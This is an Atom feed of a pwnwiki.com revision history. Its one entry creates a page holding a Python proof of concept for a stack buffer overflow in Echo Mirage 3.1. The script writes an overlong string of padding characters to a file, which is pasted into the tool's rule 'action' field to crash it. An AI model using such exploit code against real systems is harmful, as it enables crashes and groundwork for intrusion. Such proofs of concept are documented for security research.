<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Echo_Mirage_3.1_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Echo Mirage 3.1 緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Echo_Mirage_3.1_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Echo_Mirage_3.1_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T04:11:38Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Echo_Mirage_3.1_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2044&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/python  # Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow) # Date: 21-01-2019 # Software Link: https://sourceforge.net/projects/ech...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Echo_Mirage_3.1_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2044&amp;oldid=prev"/>
		<updated>2021-05-02T05:08:54Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/python  # Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow) # Date: 21-01-2019 # Software Link: https://sourceforge.net/projects/ech...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)&lt;br /&gt;
# Date: 21-01-2019&lt;br /&gt;
# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/&lt;br /&gt;
# Version: 3.1 (x64)&lt;br /&gt;
# Exploit Author: InitD Community&lt;br /&gt;
# Contact: https://twitter.com/initd_sh&lt;br /&gt;
# Website: http://initd.sh/&lt;br /&gt;
# Tested on: Windows 7&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
Step to Reproduce : Open Echo Mirage --&amp;gt; 1) Click on &amp;quot;Rules&amp;quot; --&amp;gt; 2) click on &amp;quot;New&amp;quot; --&amp;gt; 3)Copy &amp;quot;Echo-Mirage-BoF-POC.txt&amp;quot; content and Paste  in &amp;quot;action&amp;quot; field. --&amp;gt; BOoo0m.&lt;br /&gt;
&lt;br /&gt;
Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)&lt;br /&gt;
This Bug Identified by Touhid M.Shaikh&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;A&amp;quot;*24241&lt;br /&gt;
&lt;br /&gt;
RBP = &amp;quot;B&amp;quot;*8&lt;br /&gt;
&lt;br /&gt;
PAD = &amp;quot;C&amp;quot;*50&lt;br /&gt;
&lt;br /&gt;
evil = buffer + RBP + PAD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
evil_file = open(&amp;quot;Echo-Mirage-BoF-POC.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
evil_file.write(evil)&lt;br /&gt;
&lt;br /&gt;
evil_file.close()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>